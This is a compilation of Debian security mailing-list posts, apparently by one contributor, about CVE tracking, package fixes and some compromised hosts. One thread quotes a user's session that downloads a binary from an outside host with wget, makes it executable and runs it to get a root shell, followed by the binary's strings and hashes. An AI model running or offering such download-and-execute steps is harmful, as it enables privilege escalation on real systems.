Re: Switching the tracker to git
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Sun, Sep 14, 2014 at 07:06:46PM -0400, micah wrote: My guess is that the only reason that subversion is still used is inertia and that people would be happier with git. However, I'm curious to know if anyone thinks otherwise? In my experience Git also takes more time per commit if we are talking about making branches and/or pull requests. What would be the actual benefits of moving to Git and I'm not talking about some minor speed improvements. Please also note that there are hooks in SVN currently and I'm not sure if those can be migrated to Git. I'm more than happy to discuss this case in detail and even help to implement it if/when team starts to move that direction. - --- Henri Salo -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iEYEARECAAYFAlQWehsACgkQXf6hBi6kbk85kACgpTjcLWEXY8EHeqPvuCQbhs25 KX8AoKZWcUybX/NOYRTavwp3tyR4TTX6 =rNOU -END PGP SIGNATURE- -- To UNSUBSCRIBE, email to debian-security-tracker-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/20140915053315.ga19...@kludge.henri.nerv.fi
Re: Testing needed: openjdk7 update for stable-security
On Fri, Jul 12, 2013 at 10:00:49AM +0300, Georgi Naplatanov wrote: Anyway I'm going to test OpenJDK 7u25 with Eclipse 4.2.2 this weekend. I'm not sure that it will be valuable, but that is what I use daily. I have been happy with OpenJDK 7 from stable so far. Best regards Georgi Why haven't you been happy with it? --- Henri Salo signature.asc Description: Digital signature
Re: cpe ids and package names
On Wed, Nov 14, 2012 at 04:46:53PM +0100, Quentin Poirier wrote: http://anonscm.debian.org/viewvc/secure-testing/data/CPE/list?view=markup snip So? Would you be interested by a file like this? I am very interested. I think we (as in Debian-project) should start using CPEs. We probably need some kind of planning session to get ideas listed and somekind of roadmap. You can contact me directly if you want to give me tasks or share ideas etc, but I suggest we keep meeting in IRC some day. - Henri Salo ps. not yet Debian Developer -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/20121114174559.ga24...@kludge.henri.nerv.fi
Re: Audit of Debian/Ubuntu for unfixed vulnerabilities because of embedded code copies
On Mon, Jul 02, 2012 at 07:59:26PM +0200, Petter Reinholdtsen wrote: [Silvio Cesare] I recently ran the tool and cross referenced identified code copies with Debian's security tracking of affected packages by CVE. I did this for all CVEs in 2010, 2011, and 2012. This sound like a job that could become a bit easier if we tagged Debian packages with the CPE ids assosiated with CVEs, to make it easier to figure out which Debian package are affected by a given CVE. Are you aware of my proposal to do this, mentioned on debian-security and also drafted on URL: http://wiki.debian.org/CPEtagPackagesDep ? -- Happy hacking Petter Reinholdtsen Has there been any progress with this project? I am glad to help if there is something I can do? This is needed in my opinion. - Henri Salo -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/20120929202243.ga12...@kludge.henri.nerv.fi
Re: CVE-2011-1521 - fixed packet
On Thu, Jul 19, 2012 at 12:44:36PM +0200, Arne Wichmann wrote: Ok, I just created a fixed version of python2.6 for my own use. Whoever is interested can find it at [1] for the time being. If anybody has comments or improvements I am also interested. [1] http://www.saar.de/~aw/debian/python2.6_2.6.6-8.aw1.dsc http://www.saar.de/~aw/debian/python2.6_2.6.6-8.aw1.diff.gz http://www.saar.de/~aw/debian/python2.6_2.6.6-8.aw1_i386.build http://www.saar.de/~aw/debian/python2.6_2.6.6-8.aw1_i386.changes http://www.saar.de/~aw/debian/python2.6_2.6.6-8.aw1_i386.deb cu AW -- [...] If you don't want to be restricted, don't agree to it. If you are coerced, comply as much as you must to protect yourself, just don't support it. Noone can free you but yourself. (crag, on Debian Planet) Arne Wichmann (a...@linux.de) Debian security tracker says currently: CVE-2011-1521 (The urllib and urllib2 modules in Python 2.x before 2.7.2 and 3.x ...) - python3.1 removed (bug #628453) - python3.2 3.2-3 - python2.7 2.7.1-7 - python2.6 2.6.7-1 (bug #628455) - python2.5 removed - python2.4 removed NOTE: http://bugs.python.org/issue11662 Bug #628455 is still marked as done. What is needed to be done exactly to get this issue closed permanently? :) - Henri Salo -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/20120724071645.gb20...@kludge.henri.nerv.fi
Bug#681524: closed by Michael Gilbert mgilb...@debian.org (Re: Bug#681524: security-tracker: DSA-2511-1 vs. tracker)
On Tue, Jul 17, 2012 at 06:49:40PM +0200, Francesco Poli wrote: On Tue, 17 Jul 2012 01:09:03 + Debian Bug Tracking System wrote: On Fri, Jul 13, 2012 at 5:28 PM, Francesco Poli (wintermute) wrote: [...] DSA-2511-1 [...] says that CVE-2012-386[4-7] are fixed in sid by puppet/2.7.18-1, but the tracker seems to disagree [...] Tracker data has been corrected. Thanks! Mike Thanks to you. But is CVE-2012-3408 also fixed in squeeze (security) and sid? The DSA does not mention it and I cannot find it in the changelogs. I assume the tracker is right, but it looks strange that CVE-2012-3408 is associated with DSA-2511-1, while the DSA itself does not mention CVE-2012-3408... -- http://www.inventati.org/frx/frx-gpg-key-transition-2010.txt New GnuPG key, see the transition document! . Francesco Poli . GnuPG key fpr == CA01 1147 9CD2 EFDF FB82 3925 3E1C 27E1 1F69 BFFE I added that information to tracker as I received misinformation from one of the package maintainers. I will fix it today. CVE-2012-3408 hasn't been fixed in Debian versions. You should also read http://puppetlabs.com/security/cve/cve-2012-3408/ and sorry for confusion. - Henri Salo -- To UNSUBSCRIBE, email to debian-security-tracker-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/20120717183339.ga5...@kludge.henri.nerv.fi
Bug#681524: closed by Michael Gilbert mgilb...@debian.org (Re: Bug#681524: security-tracker: DSA-2511-1 vs. tracker)
On Tue, Jul 17, 2012 at 02:47:49PM -0400, Michael Gilbert wrote: Data entered into the tracker needs to be reliable. If you have not personally checked CVE references for each individual issue against the patches present in the tracker, then you cannot claim that the problem has been fixed. Leave those issues unfixed until someone who is willing to do the appropriate research has time to review the issue. Otherwise we're leaving issues unfixed and fooling ourselves into thinking they are fixed, which is just so incredibly wrong. Best wishes, Mike I got this information from package maintainer (Stig Sandbeck Mathisen s...@d.org): That issue is fixed in the 2.7.18-1 upload to unstable and in 2.6.2-5+squeeze6 upload to stable-security, along with CVE-2012-3864, CVE-2012-3865, CVE-2012-3866 and CVE-2012-3867 which those uploads mention. Which he later corrected in our email discussion: It was fixed by Puppet Labs in revision ab9150b by deprecating it in 2.7.18 (by logging a warning message), and removing it in 3.x. I was of the impression that this made it into the squeeze security release, but I was mistaken. Sorry. :/ Puppet labs sees it as a low-risk security vulnerability. (http://puppetlabs.com/security/cve/cve-2012-3408/). In order to be vulnerable, you have to: * Explicitly configure certname=ipaddress in puppet.conf. The default is the fully qualified domain name. * Allow others access to the network your agent runs on, as well as taking its IP address, or using man-in-the-middle techniques to impersonate this IP address. I could verify every issue by myself, but is that really needed in cases where package maintainer gives this information as some issues are very time consuming to verify? This was a human mistake and I am sorry. I hope trying to update security tracker and report bugs is not incredibly wrong. I asked from #debian-security how to go forward with this case as DSA did not contain CVE-2012-3408 and were following those instructions. - Henri Salo -- To UNSUBSCRIBE, email to debian-security-tracker-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/20120717191850.ge5...@kludge.henri.nerv.fi
Re: python 2.6.6 - python 2.6.8
On Mon, Jun 25, 2012 at 09:49:08AM +0200, Marc Haber wrote: Hi, a colleague pointed me to the release notes of python 2.6.8, where the following security issues are listed being fixed: * oCERT-2011-003, CVE-2012-1150, hash collision denial of service) * CVE-2012-0876, pyexpat hash randomization * CVE-2012-0845, SimpleXMLRPCServer denial of service * CVE-2011-3389, disabling of the CBC IV attack countermeasure in the _ssl module The python 2.6.8+squeeze release that I have on my squeeze systems don't mention any CVE numbers. Does this means that those issues have not been addressed (yet) in Debian? Is the security team working on backporting those fixes? Greetings Marc You can see status of security vulnerabilities in Debian security tracker, which includes bug-numbers and so on. For example http://security-tracker.debian.org/tracker/CVE-2012-1150 - Henri Salo -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/20120625114557.ga15...@lakka.kapsi.fi
Re: Weekly external check
On Tue, May 22, 2012 at 06:07:33PM +0200, Moritz Muehlenhoff wrote: On Tue, May 22, 2012 at 06:42:04AM +, Raphael Geissert wrote: CVE-2011-3102: TODO: check CVE-2012-2130: RESERVED CVE-2012-2373: RESERVED CVE-2012-2374: RESERVED CVE-2012-2375: RESERVED CVE-2012-2625: RESERVED -- The output might be a bit terse, but the above ids are known elsewhere, check the references in the tracker. The second part indicates the status of that id in the tracker at the moment the script was run. This is really nice. Shall we crank up the interval to daily runs? Cheers, Moritz Could we also list the references from the tracker (NOTEs) automatically and also what is elsewhere? - Henri Salo -- To UNSUBSCRIBE, email to debian-security-tracker-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/20120522162526.ga24...@kludge.henri.nerv.fi
Updates to CVE-2012-0882
Hello, CVE-2012-0882 does not have any information in tracker http://security-tracker.debian.org/tracker/CVE-2012-0882 Related links: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0882 https://bugzilla.redhat.com/show_bug.cgi?id=789141 https://access.redhat.com/security/cve/CVE-2012-0882 http://seclists.org/oss-sec/2012/q1/399 https://lists.immunityinc.com/pipermail/canvas/2012-February/11.html https://lists.immunityinc.com/pipermail/canvas/2012-February/14.html http://partners.immunityinc.com/movies/VD-MySQL-5_5_20.mov Could someone update tracker data, thank you? - Henri Salo -- To UNSUBSCRIBE, email to debian-security-tracker-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/20120316072819.gc17...@kludge.henri.nerv.fi
Re: Vulnerable PHP version according to nessus
On Wed, Dec 28, 2011 at 12:53:13PM +, Dave Henley wrote: Thnaks, I checked the CVE`s against the changelogs and approx. 50% is covered. Is there a website of some sort to check what kind of CVE`s have been patched? If nessus does not provide a reliable report, what is the best next step to take here? Are there any howto`s or tutorials on howto secure a php installation on a debian system? Any suggestions would be very helpful. Update all software in your www-server. Some useful links: http://security-tracker.debian.org/tracker/ http://www.debian.org/doc/manuals/securing-debian-howto/ - Henri Salo -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/20111228133153.ga15...@foo.fgeek.fi
Re: Bug#645881: critical update 29 available
On Thu, Dec 01, 2011 at 09:47:53PM +0100, Florian Weimer wrote: * Moritz Mühlenhoff: Florian, what's the status of openjdk6 for stable/oldstable? I've released the pending update for squeeze. lenny will eventually follow, and so will the pending updates for squeeze, but judging by my past performance, it will take a while. If someone else wants to work on these updates, I'll gladly share what I've learnt about the packaging. I am happy to help in any way I can, but I have no Debian-hat nor status. Is there something I could help with? - Henri Salo -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/20111201215307.gd29...@foo.fgeek.fi
gdb: CVE-2011-4355 arbitrary code execution via .debug_gdb_scripts
http://seclists.org/oss-sec/2011/q4/424 Is some package of Debian affected? Best regards, Henri Salo -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/2028190722.ga31...@foo.fgeek.fi
www.debian.org: Broken links on http://www.debian.org/doc/manuals/securing-debian-howto/ch12.en.html
Package: www.debian.org Severity: normal *** Please type your report below this line *** 12.1.3: Part: for example, the Common Criteria. Link: http://niap.nist.gov/cc-scheme/st/ 12.3.15: 1) Part: Security Contact key (key ID 0x363CCD95). Link: http://pgpkeys.pca.dfn.de:11371/pks/lookup?search=0x363CCD95%5C%7C[amp%20]%5C%7Cop=vindex 2) Part: See also the PGP/GPG keys for the security team. Link: http://www.debian.org/security/keys.txt 12.3.23: Part: (available at http://ftp-master.debian.org/ziyi_key_2006.asc, substitute 2006 for the current year Link: http://ftp-master.debian.org/ziyi_key_2006.asc Also: http://www.debian.org/security/faq Broken link: http://pgpkeys.pca.dfn.de/pks/lookup?search=0x68B64E0Dop=vindex -- System Information: Debian Release: 6.0.2 APT prefers stable APT policy: (500, 'stable') Architecture: amd64 (x86_64) Kernel: Linux 2.6.32-5-amd64 (SMP w/8 CPU cores) Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) (ignored: LC_ALL set to en_US.UTF-8) Shell: /bin/sh linked to /bin/dash -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/20110804101217.ga25...@foo.fgeek.fi
syslog-ng: dos / TEMP-0000000-0999A8
Could issue TEMP-000-0999A8[1] be the same as #457334[2] CVE-2007-6437 prone to denial of service attack? Issue #457334 is reported Fri, 21 Dec 2007 16:54:04 UTC and TEMP-000-0999A8 seems to be committed to CVE/list as[3]: CVE-2006- [syslog-ng dos] - syslog-ng 2.0rc1-2 (low) [sarge] - syslog-ng not-affected (Vulnerable code not present) There is DSA commit done at Wed Jan 16 08:10:07 2008 UTC[4], which fixes #457334. Upstream patch for #457334 is: http://git.balabit.hu/?p=bazsi/syslog-ng-2.0.git;a=commitdiff;h=3126ebad217e7fd6356f4733ca33f571aa87a170 1: http://security-tracker.debian.org/tracker/TEMP-000-0999A8 2: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=457334 3: http://anonscm.debian.org/viewvc/secure-testing?view=revisionrevision=4493 4: http://anonscm.debian.org/viewvc/secure-testing/data/DSA/list?r1=7935r2=7934pathrev=7935 Best regards, Henri Salo -- To UNSUBSCRIBE, email to debian-security-tracker-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/20110804091341.gb24...@foo.fgeek.fi
mailscanner: lock/pid file location symlink attack / TEMP-0000000-477739
Is TEMP-000-477739 same as CVE-2010-3095? Index: data/CVE/list === --- data/CVE/list (revision 15492) +++ data/CVE/list (revision 15493) @@ -2354,7 +2354,7 @@ NOT-FOR-US: SoftX FTP Client 3.3 CVE-2010-3095 [mailscanner incomplete fix for CVE-2008-5313] RESERVED - - mailscanner unfixed (bug #596403) + - mailscanner 4.79.11-2.1 (bug #596403) CVE-2010-3094 (Multiple cross-site scripting (XSS) vulnerabilities in Drupal 6.x ...) {DSA-2113-1} - drupal6 6.18-1 (low; bug #592716) Links: http://security-tracker.debian.org/tracker/TEMP-000-477739 http://security-tracker.debian.org/tracker/CVE-2008-5313 http://security-tracker.debian.org/tracker/CVE-2010-3095 http://www.mail-archive.com/debian-security-tracker@lists.debian.org/msg01016.html By the way: [Date: Sun, 27 Feb 2011 10:33:42 +] [ftpmaster: Alexander Reichle-Schmehl] Removed the following packages from unstable: mailscanner | 4.79.11-2.2 | source, all Closed bugs: 531317 --- Reason --- RoQA; orphaned -- Also closing bug(s): 303929 313145 353266 408161 410647 490948 506148 577916 583527 595945 596396 596397 596398 596399 596400 596510 596512 596514 597611 598726 605869 607226 607747 608337 Also closing WNPP bug(s): Best regards, Henri Salo -- To UNSUBSCRIBE, email to debian-security-tracker-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/20110804123941.ga27...@foo.fgeek.fi
Re: clamav: floating point exception in OLE2 scanner DoS / TEMP-0000000-6B8835
On Mon, Aug 01, 2011 at 06:50:38PM +0300, Henri Salo wrote: I think TEMP-000-6B8835 is the same as CVE-2007-2650 as seen in these links below: http://security-tracker.debian.org/tracker/TEMP-000-6B8835 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2650 http://www.debian.org/security/2007/dsa-1320 Related information: http://git.clamav.net/gitweb?p=clamav-devel.git;a=blob_plain;f=ChangeLog;hb=clamav-0.97.2 https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2007-2650 Best regards, Henri Salo Or is that different issue? I can request CVE-identifier for TEMP-000-6B8835 if that is not the correct one. Best regards, Henri Salo -- To UNSUBSCRIBE, email to debian-security-tracker-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/20110801161820.gb21...@foo.fgeek.fi
Broken links in web-page
Page http://www.debian.org/security/audit/tools contains broken links to several locations: 1) You can find all these modules in his Audit::Source page. http://hinterhof.net/~max/audit-perl/ says 404. 2) Discussion related to closing a particularly problematic piece of code can also be held upon the debian-audit mailing list, just be careful not to make it obvious which program contains the flaw. http://shellcode.org/mailman/listinfo/debian-audit says 404. Best regards, Henri Salo -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/20110728142258.gg9...@foo.fgeek.fi
Re: libpng CVE-2006-7244/CVE-2009-5063
On Sun, Jul 24, 2011 at 04:54:41PM +0200, Moritz Mühlenhoff wrote: Henri Salo he...@nerv.fi schrieb: There is two open vulnerabilities in libpng 1.2.27-2+lenny4 as you can see from: http://security-tracker.debian.org/tracker/source-package/libpng The issues I am concerned about are CVE-2006-7244 and CVE-2009-5063. Notes of the issues are: package libpng is vulnerable; however, the security impact is unimportant., but I think these aren't unimportant as you can see from here: http://www.openwall.com/lists/oss-security/2011/03/22/7 http://www.openwall.com/lists/oss-security/2011/03/28/6 Is there a plan to fix these issues? Should I create a bug-report? It's fixed already since 1.2.39-1 for both issues. Cheers, Moritz Well the tracker says the status for both CVEs is vulnerable. Please note that I am talking about oldstable. Best regards, Henri Salo -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/20110724150849.ga25...@foo.fgeek.fi
CVE-identifier for dovecot wrong Mail dir permissions
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Description: dovecot wrong Mail dir permissions Temporary name: TEMP-000-005740 CVE-identifier for this issue is: CVE-2010-0745 Can you update security-tracker, thanks. Best regards, Henri Salo -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iEYEARECAAYFAkySUTgACgkQXf6hBi6kbk9V4ACg2HoAWbNWEmHw8FbRRfwRiLIa yuYAoNQ26xczThovK/llQp4AYLDGcqGN =TDuT -END PGP SIGNATURE-
DSA-2022-1 / CVE-identifiers
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Issue DSA-2022-1 got CVE-identifiers: CVE-2010-1189: a CSS validation issue was discovered which allows editors to display external images in wiki pages. CVE-2010-1190: a data leakage vulnerability was discovered in thumb.php which affects wikis which restrict access to private files using img_auth.php, or some similar scheme. References: http://seclists.org/oss-sec/2010/q1/189 Best regards, Henri Salo -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iEYEARECAAYFAkxQRAYACgkQXf6hBi6kbk/6YACbBvKmsa4hsVbIWv29Hll5tRjP JyoAoJo0XmBwDCW/aFMZb7A3+geJcZva =qTIq -END PGP SIGNATURE-
DSA-2022-1 / CVE-identifiers
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Issue DSA-2022-1 got CVE-identifiers: CVE-2010-1189: a CSS validation issue was discovered which allows editors to display external images in wiki pages. CVE-2010-1190: a data leakage vulnerability was discovered in thumb.php which affects wikis which restrict access to private files using img_auth.php, or some similar scheme. References: http://seclists.org/oss-sec/2010/q1/189 Best regards, Henri Salo -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iEYEARECAAYFAkxQRAYACgkQXf6hBi6kbk/6YACbBvKmsa4hsVbIWv29Hll5tRjP JyoAoJo0XmBwDCW/aFMZb7A3+geJcZva =qTIq -END PGP SIGNATURE-
Debian and CVE-2010-0624
Is vulnerability CVE-2010-0624 fixed in Debian-packages already? --- Henri Salo -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/20100310145119.11a01...@foo.fgeek.fi
Re: dt_ssh5
On Wed, 04 Nov 2009 09:30:35 -0500 Bernie Dolan b...@dolanlane.net wrote: Hi, I recently became aware of the executable: dt_ssh5 in my /tmp subdirectory. Seems this is a botnet that is trying brute force attacks from my server. Has anybody else seen this? Thanks for the prompt response. - When a machine begins to run without human aid, it is time to scrap it - whether it be a factory or a government. ~Alexander Chase Yes, for example grumpy bsd guy as you can see from: http://bsdly.blogspot.com/2009/10/third-time-uncharmed.html. Could you email me the file, thanks? --- Henri Salo -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Xpdf Integer overflow
Is update for Xpdf-vulnerability coming soon for this issue: http://securityreason.com/securityalert/6674 --- Henri Salo -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Re: rootkit not found by rkhunter
On Sun, 4 Oct 2009 10:15:35 -0400 Thomas Krichel kric...@openlib.org wrote: I am running debian testing, 2.6.30 kernel. I have a rootkit installed on a bunch of machines that rkhunter does not find. This appears after infection with SHV4 / SHV5, which rkhunter found. Here it works to allow a non-root user to become root kric...@fricka:~$ mkdir a kric...@fricka:~$ cd a kric...@fricka:~/a$ ls -l total 0 kric...@fricka:~/a$ wget webmail.facill.com.br/a --2009-10-04 07:47:42-- http://webmail.facill.com.br/a Resolving webmail.facill.com.br... 201.65.241.194 Connecting to webmail.facill.com.br|201.65.241.194|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 6886 (6.7K) [text/plain] Saving to: `a' 100%[==] 6,886 6.88K/s in 1.0s 2009-10-04 07:47:44 (6.88 KB/s) - `a' saved [6886/6886] kric...@fricka:~/a$ chmod 777 a kric...@fricka:~/a$ ./a r...@fricka:~/a# Here is a situation where it does not work kric...@chichek:~$ mkdir a kric...@chichek:~$ cd a kric...@chichek:~/a$ wget webmail.facill.com.br/a --2009-10-04 07:31:15-- http://webmail.facill.com.br/a Resolving webmail.facill.com.br... 201.65.241.194 Connecting to webmail.facill.com.br|201.65.241.194|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 6886 (6.7K) [text/plain] Saving to: `a' 100%[==] 6,886 37.8K/s in 0.2s 2009-10-04 07:31:16 (37.8 KB/s) - `a' saved [6886/6886] kric...@chichek:~/a$ chmod 777 a kric...@chichek:~/a$ ./a mmap: Permission denied Does anybody here know how to delete this kit? Cheers, Thomas Krichelhttp://openlib.org/home/krichel RePEc:per:1965-06-05:thomas_krichel skype: thomaskrichel This file should at least be deleted from the host. fg...@foo:~$ file a a: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.9, not stripped fg...@foo:~$ strings a /lib/ld-linux.so.2 __gmon_start__ libc.so.6 _IO_stdin_used socket exit execl ftruncate perror sendfile unlink mkstemp mmap getpagesize getgid getuid __libc_start_main GLIBC_2.1 GLIBC_2.0 PTRh ([^_] [^_] mmap socket mkstemp unlink ftruncate /bin/sh /tmp/tmp.XX fg...@foo:~$ md5sum a b950af01be61a8cbf5d479430738bd18 a fg...@foo:~$ sha1sum a 639536caea56554406106ad8679115971485f3a2 a -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Re: rootkit not found by rkhunter
On Sun, 4 Oct 2009 12:10:04 -0400 Thomas Krichel kric...@openlib.org wrote: Michael S Gilbert writes 'apt-get update apt-get upgrade' followed by a reboot into the new kernel should bring you up to date. Since I just download the kernel last week I did not really believe your advice but I have rebooted and the problem appears gone! Cheers, Thomas Krichelhttp://openlib.org/home/krichel RePEc:per:1965-06-05:thomas_krichel skype: thomaskrichel You should use apticron and apt-dater. --- Henri Salo -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Re: Are these scan logs dangerous ?
On Sun, 5 Jul 2009 23:56:36 +0430 a dehqan dehqa...@gmail.com wrote: In The Name Of God Thanks alot for your attentions ; Yes , after rkhunter --propupd ,unhide has been ok . But about ident service ,see # chkconfig --level 23 identd off identd: unknown service But port 113 auth is open ! So which service has opened port 113 ? netstat -lnop|grep :113 --- Henri Salo -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Re: Linux infected ?
On Thu, Jan 29, 2009 at 09:04:46AM -0200, Eduardo M KALINOWSKI wrote: Rodrigo Hashimoto wrote: Hi, I received a file via e-mail and tried to open it, then the iceweasel did nothing. I tried again and I realized the iceweasel was trying to user the wine to open a file .com. Then I run the command file and I realized this is king of a virus to Windows and not Linux. This is a security risk to my debian lenny ? Even if it was a virus, the most it can do is affect your Wine files of the pseudo-Windows installation. Even so, I'm not sure it will be much effective. Even if it wrote to the registry an entry to start-up automatically, I'm not sure Wine honors this. If you are in doubt, just wipe you wine files (I think they are in ~/.wine, but I haven't used Wine in years) and start again. -- Eduardo M KALINOWSKI edua...@kalinowski.com.br http://move.to/hpkb If you do this, please make sure that there isn't any wine-processes running on system. Those might still be effective. --- Henri Salo -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Amarok CVE-2009-0135 and CVE-2009-0136
There is two different CVE IDs given to amarok's vulnerabilities: CVE-2009-0135 [1] CVE-2009-0136 [2] I beleive this DSA [3] is for the first CVE. Is there a need to patch the second one and if yes - what is the status of that process? 1: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0135 2: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0136 3: http://lists.debian.org/debian-security-announce/2009/msg00013.html --- Henri Salo -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Re: Rainbow tables on Linux?
On Thu, Oct 23, 2008 at 12:14:57PM +0200, Johann Spies wrote: I have John now running for 74 hours to try and crack one password. That is on a 2xquadcore Intel server. Regards Johann Regular john doesn't use all of your cores for good reasons. More information can be found from http://www.openwall.com/john/. You should also check their wiki. - Henri Salo -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: antivirus for webserver
On, Oct 06, 2008 at 10:10:33AM +0200, Laura Arjona Reina wrote: snip My question is if it is needed to install an antivirus for keeping the webserver safe. And if it is needed, which antivirus could I use? I thought about clamav but I read about problems keeping up-to-date the software shipped with etch-stable. Thank you Laura Arjona You can use freshclam to keep up with latest virus database. You can also use ClamAV with PHP-scripts if users are sending files to server. Old ClamAV version should not be a big problem. Of course there is new features, but I'll bet you don't need those in your webserver. - Henri Salo -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Microsoft-IIS/6.0 serves up Debian... WTF!
On Sun, 8 Jun 2008 01:27:06 -0600 JD. Brown [EMAIL PROTECTED] wrote: On Sun, Jun 8, 2008 at 12:05 AM, [EMAIL PROTECTED] wrote: Well, I thought I had seen it all... but this takes the cake. http://ike.egr.msu.edu/debian/pool/ For the heck of it, Here is some info about them. http://toolbar.netcraft.com/site_report?url=http://ike.egr.msu.edu http://private.dnsstuff.com/tools/ipall.ch?ip=35.9.37.225src=ShowIP It looks like they were running Debian before and switched this month. Seems very weird to me. Regards, That server looks like lighttpd. -- Henri Salo fgeek at fgeek.fi +358407705733 GPG ID: 2EA46E4F fp: 14D0 7803 BFF6 EFA0 9998 8C4B 5DFE A106 2EA4 6E4F signature.asc Description: PGP signature
Re: secure installation
On Wed, 05 Sep 2007 10:01:37 +0200 Johannes Wiedersich [EMAIL PROTECTED] wrote: It was installed before etch went stable, though. That shouldn't effect anything or at least development tries to avoid that kind of errors. --- Henri Salo fgeek at fgeek.fi +358407705733 GPG ID: 2EA46E4F fp: 14D0 7803 BFF6 EFA0 9998 8C4B 5DFE A106 2EA4 6E4F signature.asc Description: PGP signature
Re: secure installation
On Wed, 15 Aug 2007 14:23:06 -0500 Pat [EMAIL PROTECTED] wrote: There are a few security issues I have noticed about debian's installation. 1) No firewall setup during the install process, as it would be a simple matter to run lokkit at the end of the install I fail to see why this is not done. 2) Rpfilter and tcp syncookies are not enabled by default. Again this is a simple correction, and indeed has been mentioned in several open source linux guides for years. 3) Do we really need portmap, inetd, or nfs running by default on our workstations? There shouldn't be any ports open to internal network after installation. Where do you need firewall after installation when you can make one i.e. with iptables? - Henri 'fgeek' Salo -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: spooky windows script
